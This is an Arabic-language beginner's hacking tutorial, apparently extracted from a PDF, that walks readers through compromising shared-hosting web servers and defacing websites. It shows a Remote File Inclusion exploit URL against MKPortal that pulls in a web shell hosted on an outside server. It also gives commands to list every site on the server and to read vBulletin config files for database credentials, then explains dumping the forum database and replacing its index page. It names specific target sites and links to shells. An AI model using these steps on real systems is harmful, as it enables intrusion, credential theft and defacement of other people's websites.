كتاب الهكارز حصريا
وقبل لأبدأ بأول خطوه اقرأ هذا الجدول زين واحفظه لأن فيه
كلمات راح تصادفنا كثير وماراح نفهم معناها لو ماقرينا
هالجدول
انا ماراح اكتب تعريف كامل انا بكتب الي ابيك تفهمه بس
والباقي ولايهمك منه شئ
سيرفر كمبيوتر ذو مواصفات قويه من ناحية سرعة المعالج
والأداء وسرعة اتصال عاليه
وهذا هو الي يكون داخله المواقع وكل المواقع بمجلد
home اسمه
يعني لو قدرت ترفع شل على أي موقع بسيرفر راح
تقدر تتحكم بكل المواقع الي على السيرفر
أي خطأ في الملف نعتبره php سكريبت ملف مكتوب بلغة
ثغره ونخترق عن طريقها
PDF created with pdfFactory Pro trial version www.pdffactory.com
الثغره عباره عن خطأ برمجي في السكريبت
الاستغلال عباره عن كود يقوم بأستغلال الخطأ البرمجي
(استغلال الثغره)
الفايل
انكلود
نوع من انواع الثغرات وهو من اخطر انواع
الثغرات
وتعتبر الفايل انكلود اسهل ثغره واخطر ثغره
يعني لازم تفهمه وتحفظه ◌ الي مكتوب بلأحمر مهم جدا
ٌٌ
لاتستصعب شئ من البدايه كل شئ سهل بس ركز
واوعدك بعد ماتكمل قرايت هالكتاب تكون فاهم كيف تخترق
وراح تقدر تخترق بعد هالكتاب
راح نبدأ بأول خطوه
انا ماراح اشرح شرح علمي كامل انا راح اكتب الي اشوفه يفيد
المبتدأ وراح ابتعد عن الاسلوب العلمي الي يبعد المبتدأ عن
جو الموضوع ويخليه يستصعب الهكر بصفه عامه
وراح نبدأ بأول خطوه
PDF created with pdfFactory Pro trial version www.pdffactory.com
ماهو الشل؟
(php) الشل عباره عن ملف يتم كتابته بلغة البي اتش بي
ويقوم هذا الملف بتوجيه اوامر لسيرفر لفتحمجلد معين او رفع
اندكس اختراق او أي شئ اخر تريد ان تعمله فبهذا الملف تعمل
أي شئ تريد بسيرفر...
هذا الشل يتم رفعه عن طريق الثغرات الموجوده بسكريبتات
المركبه بالمواقع
هذا اهم شئ لابد انك تعرفه عن الشل وهذا انت عرفته
ننتقل للخطوه الثانيه
PDF created with pdfFactory Pro trial version www.pdffactory.com
ماهي الثغرات؟
الثغرات هي اصعب شئ في الهكر لابد ان تتعمق فيها اكثر
وبرفق كتاب هذا الباب خاصعن الثغرات
**والثغرات تحتاج الى انسان يتحلى بصبر**
◌ ابيك تفهم بلأول نقطتين مهمه جدا
ٌٌ
لما تبي تفتح لك موقع تروح تدور شركة استضافه ·
شركة الاستضافه هذي يكون عندهم شئ اسمه سيرفر ·
السيرفر يكون على كمبيوتر نظامه لينكس مو زي انظمتنا
ويندوز
PDF created with pdfFactory Pro trial version www.pdffactory.com
نظامهم لينكس وهو اسرع بكثير من الويندز واقوى منه
^_*
كل سيرفر يكون بداخله مواقع
في غلطه كثير من المبتدئين يقع بها وهو لما يبي يرفع شل
<<بعد قليل راح افهمكم على طريقة رفع شل
vb انه لما يبي يرفع شل يروح يدور لثغرات المنتدى
او السكريبتات المركبه على الموقع
وفي الاخير اذا مالقي ثغره يقول يالله مأقدرت اخترق الموقع
لا ياحبيبي *_^
انت لما تبي تخترق موقع تطلع أي بي السيرفر الي عليه الموقع
لأن لاتنسى اني قلت لكم ان كل موقع يكون داخل سيرفر وكل
سيرفر يكون داخله مواقع كثيره
وانت لما ترفع شل على أي موقع موجود بسيرفر راح تتحكم
بسيرفر كله والتحكم بسيرفر كله يعني التحكم بالمواقع الموجوده
بسيرفر
والتحكم كما قلنا بلأول يكون عن طريق الشل
PDF created with pdfFactory Pro trial version www.pdffactory.com
اذا مافهمت العباره الي فوق فقرها اكثر من مره وراح تفهم
بس أهم شئ التركيز *_^
النقطه الثانيه الي حبيت اقلكم عليها ·
ان الثغرات موجوده بشئ اسمه سكريبت
بتسئلني وتقولي يامخاوي وشالسكريبت ؟
انا اقلك حبيبي وشالسكريبت
(php) السكريبت عباره عن ملف يتم كتابته بلغة البي اتش بي
وكل صاحب موقع مركب سكريبتات بموقعه
بتقلي ليه يامخاوي اصحاب المواقع يركبون سكريبتات وش
الفائده منه؟
انا اقلك
php الحين السكريبت كما قلت عباره عن ملف مكتوب بلغة
يقوم هذا الملف بخدمة اصحاب المواقع ويسهل لهم امور كثيره
مثل المنتدى هو عباره عن سكريبت
وانت تتصفح بعضالمواقع تلاقي مكتوب في رئيسية ◌ احيانا
ٌٌ
الموقع
PDF created with pdfFactory Pro trial version www.pdffactory.com
مركز التحميل
او
ألبوم الصور
او
سجل الزوار
او
مكتبة البرامج
وغيرها غيرها الكثير
وراح اكتب انواع كثيره من السكريبتات المشهوره عشان تقدر
تبحث عنها وترفع شل عن طريقها في هذا الكتاب
الحين راح استعرضلكم بعضصور السكريبتات عشان تفهمها
زين
لأني ماودي اتعدا خطوه الا وانا متأكد انك فاهم كل شئ
لما تظغط على مثلاٌ مكتبة البرامج تلاقي برامج كثيره
PDF created with pdfFactory Pro trial version www.pdffactory.com
هذا سكريبت
انا قلت انه يسهل على اصحاب الموقع
شفتم كيف صاحب الموقع اصلا ماحمل ولا رفع برنامج بس رفع
السكريبت والسكريبت بداخله البرامج *_^
الي يهمنا من الكلام هذا كله ان الثغره توجد داخل السكريبت
ويبي لنا نستغلها
عشان نقدر نرفع شل
الثغره عباره عن خطأ برمجي
وحنا لازم نجيب كود استغلال عشان نقدر نستغل هذا الخطا
ونرفع شل
وراح نتطرق لثغرات والاستغلال اكثر بعد اشوي
الثغرات انواع
فايل انكلود
SQL
XSS
وانواع كثيره لكن هذي اهم ثلاثه واشهرها
واخطرها واسهلها الفايل انكلود
وراح يكون شرح كامل عن الفايل انكلود لحد ماتطبق على موقع
من خلال الي راح اكتبه هنا
PDF created with pdfFactory Pro trial version www.pdffactory.com
وهذا شرح كامل لأهم انواع الثغرات
في هذا الكتاب وانا استفدت منه كثير
وهذا هو رابط الكتاب
http://www.hack15.com/Exploits.rar
وبااسوورد فك الظغط
كلمة مرور فك الضغط
hack15
PDF created with pdfFactory Pro trial version www.pdffactory.com
ماهي خطوات اختراق موقع؟وكيف نرفع الشل؟
خطوات اختراق موقع هي الاتي
اول شئ حدد الموقع الي تبي تخترقه
موقع بيت الهكر ◌ وانا راح اختار مثلا
ٌٌ
رابط الموقع
http://www.v99x.com/vb/index.php
اول شئ نطلع أي بي السيرفر
وهذا شرح بصور لأستخراج أي بي السيرفر الي مركب عليه
الموقع
اول شئ نظغط على ابدأ بعدين تشغيل ونكتب
الامر
Cmd
ونظغط انتر
PDF created with pdfFactory Pro trial version www.pdffactory.com
بعدين تفتح لنا شاشه سوداء
شوفوا بعد ماكتبنا
Ping www.v99x.com
وظغطنا انتر وشصار
طريقة نسخ الاي بي لتسهيل عليكم
بتكون بالخطوات هذي
اول شئ حط الماوسعلى الشاشه السوداء الي فيها الاي بي
PDF created with pdfFactory Pro trial version www.pdffactory.com
اظغط الماوساليمين
بيجيك خيارات اول خيار
الي هو وضع علامه اظغط عليه
بعدين حدد على الاي بي
بعدين
الحين عرفنا نطلع الاي بي وننسخه<<والله الي يسمعه يقول
مخترع صاروخ*_^
المهم نروح نبحث عن السكريبتات المركبه على السيرفر
بتقلي يامخاوي وشلون ابحث عن السكريبتات المركبه في السيرفر
انا اقلك على الطريقه
روح احدا مواقع البحث غير قوقل
PDF created with pdfFactory Pro trial version www.pdffactory.com
وانا افضل
www.msn.com
في خانة البحث نكتب الاي بي بهذي الطريقه
ip:75.126.81.157
ip: اذا كتبتم كذا 75.126.81.157
فراح يطلع لكم كل المواقع الي على السيرفر
واذا تبي تبحث عن سكريبت معين
فتكتب اسم السكريبت بعد الاي بي
مثلا تٌبي تبحث عن سكريبث
اسمه
MKPortal
فيكون كتابة البحث عن هذا السكريبت بهذي الطريقه
ip:75.126.81.157MKPortal
PDF created with pdfFactory Pro trial version www.pdffactory.com
وهذي صوره لتوضيح اكثر
والان راح اكتب لكم سكريبتات خطيره لما تبي تخترق موقع
ابحث عنها
◌ علما
ٌٌ ان كل كلمه راح اكتبها تحت كل ماعليك ان تضعها بعد
رقم أي بي السيرفر
تبحث وماتلاقي يطلع لك شئ هذا معناته ان مافي ◌ احياناٌ
ٌ
سكريبت مركب على أي موقع بسيرفر بنفس الاسم الي بحثت
عنه
powered by
لأستخراج كامل السكريبتات المركبه على السيرفر
Warning
لأستخراج الأخطأ
Upload
هذا لأستخراج مركز التحميل
PDF created with pdfFactory Pro trial version www.pdffactory.com
◌ ومركز التحميل له طرق كثيره جدا
ٌٌ
منها
بالعربي اكتب بعد رقم الاي بي
مركز التحميل
وانا افضل البحث عن السكريبت بأسمه العربي
لأن اكثر اصحاب المواقع يشيل اسم السكريبت من اخر الصفحه
ويكتبجميع الحقوقمحفوظه وقتها ماراح يطلع
لهذا اكتب اسمه بالعربي اشوف انه افضل بكثير
MKPortal
لات للبحث عن ا
aspjar guestbook
للبحث عن سجل الزوار
او تكتب بالعربي سجل الزوار وراح تجيك
لسجل الزوار ◌ ايضا
ٌٌ
XP Book
وهذا سكريبت خطير
images ٤
PDF created with pdfFactory Pro trial version www.pdffactory.com
Images
Glary
Downloads
PhpBB
Powered by : Down Asaher v 2.5
هذي هنا سكريبتات خطيره
بالعربي اكتبوا وانا افضل ◌ ايضا
ٌٌ ألكتابه بالعربي مثل ماقلت
مثل كتابة
بعد الاي بي
سجل الزوار
مكتبة البرامج
مركز التحميل
له ا
البوم الصور
PDF created with pdfFactory Pro trial version www.pdffactory.com
وغيرها غيرها الكثير
ابحث وراح تجد اكثر من سكريبت مصاب بكل سيرفر
وكل سكريبت تلاقيه روح ابحث عن ثغراته بطريقتين
الي راح احطه لك الان الاوله موقع
/http://www.milw0rm.com
والثانيه عن طريق أي موقع بحث والطريقه موجوده تحت بصور
وراح تقدر ترفع شل بأذن الله
مثلا تقول لي يامخاوي انا لقيت سكريبت
MKPortal اسمه
من وين اجيب الأستغلال حقه
انا اقلك حبيبي
في مواقعمختصه بثغرات السكريبتات كل يوم ينزلون اكثر من
اربعه ثغرات
PDF created with pdfFactory Pro trial version www.pdffactory.com
طيب انا اعطيك رابط الموقع اول شئ
/http://www.milw0rm.com
وهذي هنا صوره للموقع وفيها بعضالشروحات
فتحت لنا هالصفحه (search) طيب بعد ماظغطنا على بحث
PDF created with pdfFactory Pro trial version www.pdffactory.com
وبعد كتابة اسم السكريبت المصاب في الفراغ
طلع لنا الثغرات وهذي صوره من الي طلع لنا
Remote File احنا راح نجرب اول ثغره وهي من نوع
Inclusion
PDF created with pdfFactory Pro trial version www.pdffactory.com
◌ جدا ◌ لأنه خطيره وسهله جدا
ٌٌٌٌ
نظغط على اول ثغره
MKPortal NoBoard Module (BETA)
Remote File Inclusion Vulnerability
MKPortal
هذا اسم الثغره
PDF created with pdfFactory Pro trial version www.pdffactory.com
في ناسيقول كيف اعرف الاستغلال
أستغلال ثغرات الفايل انكلود
دائما يجي تحت او بجنب كلمة
Example
او يجي اخره
shell.txt
او
PDF created with pdfFactory Pro trial version www.pdffactory.com
[ shell ]?
عرفنا الاستغلال بقى علينا نعرف وشنسوي
قبل لاتعرف بعضالمصطلحات المهمه في هذا الاستغلال
http://[ site
]/mkportal/include/user.php?MK_PATH=[ shell ]?
هذي هنا بدلها تحط رابط الموقع >>[site]
مثلا نقول ان الموقع
رابطه كذا
www.zafrah.net/mkportal
هذا السكريبت المصاب >>mkportal
mkportal/include/user.php?MK_PATH
هذا الاستغلال حق الثغره
=[ shell ]?
وبدل هذي هنا تحط رابط الشل كامل
تقول ماعندي شل او ماعندي موقع عشان ارفع عليه شل ◌ مثلا
ٌٌ
PDF created with pdfFactory Pro trial version www.pdffactory.com
راح اعطيك اخر هالكتاب شرح كامل لفتح موقعمجاني ورفع
الشل وكل شئ راح يتعلق بمشكلة الشلات
وبعد ماحطينا رابط الشل يكون الاستغلال هكذا
http://www.zafrah.net/mkportal/include/user.php?M
K_PATH=http://www.members.lycos.co.uk/powerhos
ting/ch99.txt?
تحط علامة استفهام مثل ماوضعت انا txt لاتنسى بعد كلمة
\
طيب نفترضان لقيت ثغرات في المليورم لكن مو منوع فايل
انكلود
فقدامك طريقتين يأما تروح تبحث عن شروح عن طريقة استغلال
نوع ثغره معينه
ويأما تروح قوقل
وراح تلاقي شروح عنها مثل
تروح قوقل وتكتب
PDF created with pdfFactory Pro trial version www.pdffactory.com
الثغرات كثيره بكل سكريبت أنت ابحث وابتعد عن اليئس
لعلك تواجه صعوبه في اول مره تستهدف موقع لكن المره
ومايحتاج له ◌ الثانيه والثالثه خلاصتحس ان الامر سهل جدا
ٌٌ
شروحات ولا شئ...
واسهل سيرفر راح تقدر ترفع عليه شل هو السيرفر الي مواقعه
كثير والسكريبتات المركبه على المواقع كثيره
وقتها بس ابحث عن أي سكريت سهل واخترق وانا اخوك
^_*
تلاقي سكريبت وتبي تطلع ثغرات جديده انت تروح ◌ واحيانا
ٌٌ
JAAScoisX- تحمل السكريبت في جهازك ووبرنامج اسمه
يطلع لك الاخطاء الحاصله بسكريبت وانت عليك Code
الاستغلال
انا ماشوف هالطريقه له داعي فهمها بنسبه للمبتدئيين لأنه لو
تعمق فيها وهو لسى مبتدأ راح يحس الهكر صعب
PDF created with pdfFactory Pro trial version www.pdffactory.com
لهذا اتركها بعد فهمك لكل مافي هذا الكتاب وقدرتك على
التطبيق وقتها تعلم باقي العلوم المتطوره
وانا مؤلف هالكتاب على اساسابتعد عن شئيين الاول طولت
الكلام الي مالها داعي
الثاني ابعاد المبتدأ عن الامور الصعبه والكلام الي يخليه يبطل
يدخل في عالم الهكر
نكمل شرحنا
بعد ماحطيت استغلال ثغرة
Remote File Inclusion
وحطيت رابط الشل خل نشوف الشل بيفتح لنا او لا
اذا فتح معناتها ان الثغره مو مرقعه بسكريبت
PDF created with pdfFactory Pro trial version www.pdffactory.com
تم رفع الشل ولله الحمد
بعضالمبتدئين يمر بأشياء منها اول مايحط رابط الشل
والاستغلال يجيه صفحة خطأ او يحوله الرابط للمنتدى او رئيسية
الموقع
وغيرها...الخ...!
هنا راح اقلك ان الثغره مرقعه يعني ماتقدر تخترق عن طريقها
دور سكريبت غيره
PDF created with pdfFactory Pro trial version www.pdffactory.com
طبق mkportal وبنفس الطريقه الي طبقناها على السكريبت
على أي باقي السكريبت
من ناحية البحث عن السكريبت في السيرفر
ومن ناحية البحث عن استغلالها
mkportal وكل شئ طبقه بنفس ماسويت في هذا السكريبت
وارفع شلك وراح تصل للي تبغاه في اقل منمما تتوقع بس
التركيز اهم شئ في الهكر كله *_^
طيب بتقولي يامخاوي الحين انا رفعت شل وشاسوي بعدين انا
بقلك الان وشتسوي
لهذا بغير هذا الشل r اول شئ انا احب شل 57
r وبحط 57
اول شئ تسويه هو انك تستعرضكل المواقع الي على السيرفر
◌ وقبل لاتستعرضها ابقلك اشياء مهمه جدا
ٌٌ
PDF created with pdfFactory Pro trial version www.pdffactory.com
وراح اشرح بعض الاشياء المهمه لكي تفهمها زين
safe_mode: OFF
السيف مود=الوضع الامن
وقتها تقدر تلعب بسيرفر بكيفك off اذا كان اوف
بس لما تجي تلاقي مكتوب
safe_mode: on
وقتها يبي لك تتخطى الوضع الامن
وانا دامي وضعت هذا الشرح للمبتدئيين فعناتها لايهم هذاي
بداية أي واحد
ولكن لما تريد تتخطى الوضع الامن فتلاقي شروحات كثير
وبالفديو كمان
^_*
اسم مستخدم الموقع
PDF created with pdfFactory Pro trial version www.pdffactory.com
كل موقع داخل السيرفر له اسم مستخدم خاصبه
وبهذا الاسم تتنقل داخل السيرفر مو برابط
الصلاحيه
الصلاحيات انواع
وهذا مدير السيرفر كامل يعني يتحكم بكل شئ بكيفه Root
يحذف ويضيف ويعدل كل شئ بيده
هذا اسم مستخدم الموقع User
وهو بأمكانه حذف تعديل اضافة كل شئ يريد بموقعه بس
user يعني لو رفعت شل يوم من الايام ولقيت صلاحيتك
تقدر تسوي أي شئ بالموقع الي انت به بس مواقع ثانيه على
نفس السيرفر ماتقدر تسوي فيها شئ مره
في هذي الصلاحيه تقدر تعدل وتحذف وتنسخ وتسوي Nobody
لدات المصرحه تصريح ٧٧٧ الي تبي في ا
لدات الغير مصرحه بتصريح ٧٧٧ ماتقدر تعدل فيها ولا وا
تقدر تسوي شئ بها مره
يعني زي انا الحين في الشل هذا صلاحيتي
Nobody
PDF created with pdfFactory Pro trial version www.pdffactory.com
ومعناها زائر,
طيب الحين حنا رفعنا شل وعرفنا صلاحيتنا وعرفنا مكان
تواجدنا بسيرفر بقي علينا نعرف وشلون نطلع المواقع الي
بسيرفر
نطلعها بهذا الامر
ls -la /etc/valiases
نحط هذا الامر في مكان الاوامر الي ذكرته لكم فوق
ونظغط انتر ويفتح لنا مربع فوق كبير موجوده به المواقع وهذي
صوره راح تبين لك الوضع كامل
r ,راح استخدم في الباقي شل 57
لسهولته
PDF created with pdfFactory Pro trial version www.pdffactory.com
طيب نختار موقع لننتقل له
rw-r--r-- 1 afaakco mail 15 Sep 11 17:57 -
aafaak.com
هذا هنا السطر فيه رابط الموقع واسم المستخدم والصلاحيه
يهمنا اسم المستخدم ناخذه وهو
Afaakco
PDF created with pdfFactory Pro trial version www.pdffactory.com
لما نبغى ننتقل نحط في سطر تواجدك بسيرفر
هالأمر
/home/????/public_html/
هذامجلد داخله المواقع Home
؟؟؟<<بدل علامة الاستفهام حط اسم مستخدم الموقع الي تبي
تنتقل له
هذا كل مايهمك ودامنا نبي ننتقل لموقع اسم مستخدمه
Afaakco
فبيكون الأمر هكذا
/home/Afaakco/public_html/
PDF created with pdfFactory Pro trial version www.pdffactory.com
خل نشوف الحين الصوره هل تم النقل ام لا
تلاقي كتابات باللوان r وعشان تتأكد ان تم النقل في شل 57
الاحمر اعلى الشل اخر سطر فيها هو مكان تواجدك *_^
Nobody طيب دام صلاحيتك
وقلنا ان هالصلاحيه مايمديك تسوي شئ ماغير تتنقل وتشوف
اما تحذف تعدل ترفع ماتقدر غير فيمجلد تصريحه لازم يكون
٧٧٧
وحنا نبي نرفع اندكس اختراق
وشالسواه ؟؟
انا اقلكم وشالسواه
نروح نبحث عنمجلد تصريحه ٧٧٧
بتقلي كيف
PDF created with pdfFactory Pro trial version www.pdffactory.com
اول شئ راح اشرح واكمل الاختراق العشوائي داخل السيرفر
بعدين راح اشرح استهداف موقع معين داخل السيرفر
اول شئ اذا بغيت تبحث عنمجلد تصريحه
٧٧٧
فعليك البحث فيجميع المواقع الي بسيرفر مو بس موقع واحد
PDF created with pdfFactory Pro trial version www.pdffactory.com
وراح تقلي يامخاوي المشكله ان التصاريع مو مكتوبه ارقام يعني
مو مكتوب ٧٧٧
وشيدريني
انا اقلك وشلون تعرف
لد الي تصريحه ٧٧٧ ا
تكون مكتوبه صلاحيته بهذي الطريقه ◌ دائما
ٌٌ
Drwxrwxrwx
لد تصريحه ٧٧٧ اذا لقيت هالكلمه اول سطر اعرف ان ا
advs طيب انا لقيتمجلد اسمه
PDF created with pdfFactory Pro trial version www.pdffactory.com
لد ليتم النقل يعني في المكان الي قلت نحط به اسم ا
كان مكتوب
home/yamnaty/public_html/
حنا بس نضيف عليها
advs
يعني بيكون كذا
PDF created with pdfFactory Pro trial version www.pdffactory.com
home/yamnaty/public_html/advs
وخلاصاضغط انتر وتلاقي نفسك انتقلت للمجلد الي تبيه
لد هذا بعدين ارفع اندكسك او أي شئ تبي في ا
طيب لو تبي تخترق موقع معين في السيرفر
Nobody في طريقتين الاولى تتطى صلاحية
وهذا شرح هنا لتخطي صلاحية يوزر
اول شئ ارفع هالملف بجهازك وفك الظغط عنه وحط المبلف الي
sym4.php داخله
على سطح المكتب
http://up.7cc.com/get-11-2007-8cc4p81w.zip
فوق شرح كامل لأستخراجمجلد تصريحه ٧٧٧ والانتقال له بعد
بعد ماتنتقل للملف كما موضح لكم بلأعلى
داخل الشل اظغط على استعراضتابع معي الشرح
PDF created with pdfFactory Pro trial version www.pdffactory.com
بعدين اظغط رفع تلاقي الملف ارفع خلاص شوفوا معاي
طيب لازم نستعرضالملف الان بتقولي كيف نستعرضه يامخاوي
اانا اقلك حبيبي وشلون نستعرضه
PDF created with pdfFactory Pro trial version www.pdffactory.com
طيب قلت لكم ان هذا مكان تواجدنا
home/yamnaty/public_html/advs/
هو اسم home وقلت لكم في اول الكتاب ان بعد كلمة
مستخدم الموقع الي نتنقل به طيب اسم المستخدم غير عن رابط
الموقع اجل لازم نجيب رابط موقع حق اسم المستخدم هذا
yamnaty
اول شئ في مربع الاوامر
نضع هذا الامر
ls -la /etc/valiases
ثم انتر
بعدين يجينا في المربع الكبير روابط المواقع في اخر كل سطر
واسامي المستخدمين وهذي اكيد انتم فهمتوها في اول الكتاب
PDF created with pdfFactory Pro trial version www.pdffactory.com
طيب عرفنا ان هذا رابط الموقع
yamnat.net
طيب نبي ندخل على الي رفعناه قبل اشوي وشنسوي
لو تلاحضون في مكان تواجدنا
/home/yamnaty/public_html/advs
لد الي رفعنا به الاداه هذا ا >>Advs
لد اول يعني لازم اجل ندخل على ها
بيكون الرابط كذا
www. yamnat.net/Advs
PDF created with pdfFactory Pro trial version www.pdffactory.com
Advs وبعد كلمة
نحط اسم الملف الي نبي نستعرضه الا وهو
Sym4.php
من الاخير الرابط راح يكون
www.yamnat.net/Advs/sym4.php
شوفوا ھذا ھو الملف فتح معنا
خلاصانتهينا من شرح تخطي صلاحية يوزر
عشان تقدر تتحكم في الموقع الي تبيه براحتك
PDF created with pdfFactory Pro trial version www.pdffactory.com
◌ طيب مثلا
ٌٌ في موقع ماتبي غيره من السيرفر وتبي ترفع
اندكس اختراقك في المنتدى حق الموقع
أول شئ طلع ملف اسمه الكونفق
ملف الكونفق هذا الملف اهم شئ في منتدى أي شخص
لأن لو طلعت المعلومات الي فيه تقدر تنسخ باك اب للموقع
وتقدر بعد تدخل لوحة تحكم المنتدى بسمه وهو مايدري تقدر
ترفع صفحة اختراق في المنتدى
أي شئ تبيه تقدر
طيب الحين متشوق تقول طيب كيف اطلعه يامخاوي ؟
انا اقلك حبيبي
حط في مكان الاوامر بشل هذا الامر
cat /home/???/public_html/vb/includes/config.php
؟؟<<هذي هنا بدلها تحط اسم مستخدم الموقع
وخلك معي راح احط شرح بصور عشان تفهم اكثر
PDF created with pdfFactory Pro trial version www.pdffactory.com
طيب بتقول لي طلعته يامخاوي وشاسوي بعد ؟
انا اقلك وشتسوي الان يهمنا من ملف الكونفق كله اربع او
خمس اسطر وانا اقلك الان وشلون تجيبها
$config['Database']['dbname
هذا سطر اسم قاعدة البيانات
config['MasterServer']['username'
هذا السطر يدل على اسم المستخدم لقاعدة البيانات
PDF created with pdfFactory Pro trial version www.pdffactory.com
هذا السطر يدل على كلمة مرور قاعدة البيانات
$config['MasterServer']['password'
هذا السطر يدل على رابط لوحة تحكم المنتدى
config['Misc']['admincpdir'
هذي في نظري هي اهم شئ
طيب الان اقلكم وشنسوي ووشلون نطلعها
نروح على الكونفق وداخله نظغط
control+F
بيجينا هالمربع
تكتب فيه الأشياء الي تبي تطلعها وانا كاتبها لكم فوق
PDF created with pdfFactory Pro trial version www.pdffactory.com
وبعطيكم مثال بصوره على واحده منها
طيب بعد ماطلعت كامل المعلومات الي احتاجها من ملف
الكونفق
وحطيتها في مستند نص عشان ماتنساها
بقى علي
اروح يم شل
CH99
انا افضله عن الشلات الباقيه في عملية نسخ الباك اب وعملية
رفع الاندكس
بعد ماندخل على شل
CH99
PDF created with pdfFactory Pro trial version www.pdffactory.com
نلاقي خيار فوق وهو
SQL
نظغط عليه
طيب بعدين يفتح لك هالصفحه
ضع هنا اسم مستخدم قاعدة البيانات userneme : في خانة
<<تحصلها بكونفيق المنتدى.
ضع هنا كلمة مرور قاعدة البيانات << password : في خانة
تحصلها بكونفيق المنتدى.
ضع هنا اسم قاعدة بيانات المنتدى << Database : في خانة
تحصلها بكونفيق المنتدى.
السيرفر اللي عليه المنتدى ip ضع هنا عنوان Host : في خانة
اذا كنت على نفس السيرفر
خله مثل ماهو عليه >> localhost . ضع عبارة
PDF created with pdfFactory Pro trial version www.pdffactory.com
ضع هنا منفذ الاتصال بقواعد البيانات وغالباً ما port : في خانة
يكون ٣٣٠٦ . يفضل ان تتركه مثل ماهو عليه
بعدين اظغط على
connect ر
الصور هذي الي الان راح استعرضها تحت لكم من احد دروسابو
عابد
WWW.V99X.COM
اذا تم الاتصال بنجاح بتطلع لك هالشاشة واضغط على زر
dump -: لنسخ القاعدة كما بالصورة
-: التالية بعدها راح تفتح لك الصفحة
PDF created with pdfFactory Pro trial version www.pdffactory.com
اضغط على زر dump شاشة حفظ الباك اب سوي وراح تطلع لك
حفظ حفظ
وانتظر لين يحملها كلها بجهاز ان شاء
ومبروووووووووووووووك عليك باك أب المنتدى
اانا حقيقه قلت مهما شرحت بصور ماراح يكون شرحي افضل
من شرح ابو عابد فنقلت لكم شرح نسخ الباك اب
PDF created with pdfFactory Pro trial version www.pdffactory.com
طيب بنسبه لرفع اندكس الاختراق فبيكون
في طريقتين
اول طریقھ
اول شئ تنتقل لمجلد في بي ویكون امر الانتقال
/home/?????/public_html/vb
لد في بي ?<<بدلها حط اسم مستخدم الموقع الي تبي تنتقل
PDF created with pdfFactory Pro trial version www.pdffactory.com
بعدين القيام بحذف ملف الاندكس حق المنتدى ووضع اندكسك
مكانه
ويكون الامر بوضع هذه الكلمه في مربع الاوامر ثم انتر
Rm index.html
تلاقيه انحذف
امر حذف ملف معين
Rm name
Name حط بدال
اسم الملف الي تبي تحذفه
روح تحت Vb من داخلمجلد Index.html بعد ماتحذف
PDF created with pdfFactory Pro trial version www.pdffactory.com
تلاقي مكتوب استعراضاظغط على استعراضوارفع ملف
الاندكس حقك
Html بصيغة
روح يم المنتدى تلاقيه ارفع أندكسك على المنتدى كامل
والف الف الف مبروك عليك المنتدى *_^
وفي طريقه ثانيه هي عن طريق تغير مابداخل قالب فور هوم
لكن هذي مأفضلها لأنها تخلي صفحة اختراقك على رئيسية
المنتدى بس
تشفير الكونفق
الجدار الناري
تغيير مسار الكونفق
من اصحاب ◌ هذي مشكلات قد تواجهنا بس لأنها قليل جدا
ٌٌ
الموقع من يعمل هذه الاشياء ولأن هذا الكتاب اعددته للمبتدأ
PDF created with pdfFactory Pro trial version www.pdffactory.com
ولو فهم ماكتبت انا لوجد ان المشاكل الي ذكرتها سهله مره
مره
ولو يبي حل لها اقرب موقع هكر او صديقنا قوقل
◌ يكتب به تخطي مشكلة تشفير الكونفق مثلا
ٌٌ
يطلع له دروسلليل
*_^
طريقة انشاء موقع خاصبك
طيب كثير منا يبي يكون عنده موقع
طيب انا حعطيك رابط الان وحشرح لكم شرح كامل طريقة عمل
موقعمجاني وطريقة رفع الملفات وتغيير التراخيصللأخر
طيب اول شئ ادخل على هالموقع
http://www.tripod.lycos.co.uk/
بتفتح لك هالصفحه
PDF created with pdfFactory Pro trial version www.pdffactory.com
بعدين تفتح لك هالصفحه
PDF created with pdfFactory Pro trial version www.pdffactory.com
بتفتح لك هالصفحه
PDF created with pdfFactory Pro trial version www.pdffactory.com
2
PDF created with pdfFactory Pro trial version www.pdffactory.com
ثم اذهب لبريدك تلاقي رساله
بعد ماتظغط على رابط التفعيل تجيك هالصفحه تابع يالغلا
PDF created with pdfFactory Pro trial version www.pdffactory.com
بتجيك هالصفحه بعدين
PDF created with pdfFactory Pro trial version www.pdffactory.com
الف الف مبروك الحين صار عندك موقع *_^
طيب عشان تقدر ترفع شل لابد ان يكون عندك برنامج الاف تي
بي
وانا افضل برنامج
LeapFTP
وهذا رابط البرنامج لتحميله
http://www.traidnt.net/vb/attachment.php?attach
mentid=83316&d=1161656975
طيب بتفتح لك واجهة البرنامج وهذي صوره منها
PDF created with pdfFactory Pro trial version www.pdffactory.com
طيب بتقول يامخاوي وشلون اعرف رابط موقعي انا اقلك
http://www.members.lycos.co.uk/drbah
<<هذي استبدلها بأسم مستخدم موقعك الي حطيته
بلأول drbah
وطريقة وضع رابط الموقع في الاف تي بي
http وبدون www تكون بدون
وتحط بدل
http://www
تحط بدلها
وبعدها نحط رابط الموقع ftp:
PDF created with pdfFactory Pro trial version www.pdffactory.com
تابع معي الشرح
بتقلي يامخاوي وشلون ارفع شل على موقعي المحاني واغير
تصريحه
تابع معي وانا اخوك
PDF created with pdfFactory Pro trial version www.pdffactory.com
الحين في بالك سؤال
وشلون طيب استعرضالشل
http://www.members.lycos.co.uk/drbah
<<هذي استبدلها بأسم مستخدم موقعك الي حطيته
بلأول drbah
drbah بعد كلمة
حط /واسم الملف بالكامل
PDF created with pdfFactory Pro trial version www.pdffactory.com
r57.php زي انا قبل اشوي رفعت ملف اسمه
يعني لما ابي استعرضالملف احط هالرابط
http://www.members.lycos.co.uk/drbah/r57.php
استبدلها بأسم مستخدم موقعك drbah كلمة
الحين عرفنا وشلون نرفع ملف ووشلون نستعرضه
طيب بتقلي وشلون اغير تصريح الملف الى ٧٧٧
تابع معي
PDF created with pdfFactory Pro trial version www.pdffactory.com
بيفتح لك هالمربع
الحين الملف الي اخترنا نغير تصريحه نلاقي تصريحه
٧٧٧
خلاصالحين نقدر نستخدمه
حبايبي في ثغرات الفايل انكلو ◌ دائما
ٌٌ د وهي اخطر انواع
txt الثغرات لما تبي تحط رابط شل لازم تكون صيغة الشل
تحط علامة استفهام txt وبعد
طيب انا عشان ماتتعب وتقول يالله من وين اجيب الشل
ومدري وشو
txt وبصيغة php هنا راح احط لك شلات بصيغة
PDF created with pdfFactory Pro trial version www.pdffactory.com
ان لما تبي ترفع شل لازم صيغته ◌ ولاتنسى دائما
ٌٌ txt
بس لو حطيت رابط الشل كذا يعني
/http://www.members.lycos.co.uk/powerhosting
?ch99.txt
وسويت له استعراض
txt وهذا هنا شلات من نوع
بالماوسالايمن بعدين حفظ بأسم
http://www.members.lycos.co.uk/powerhosting/
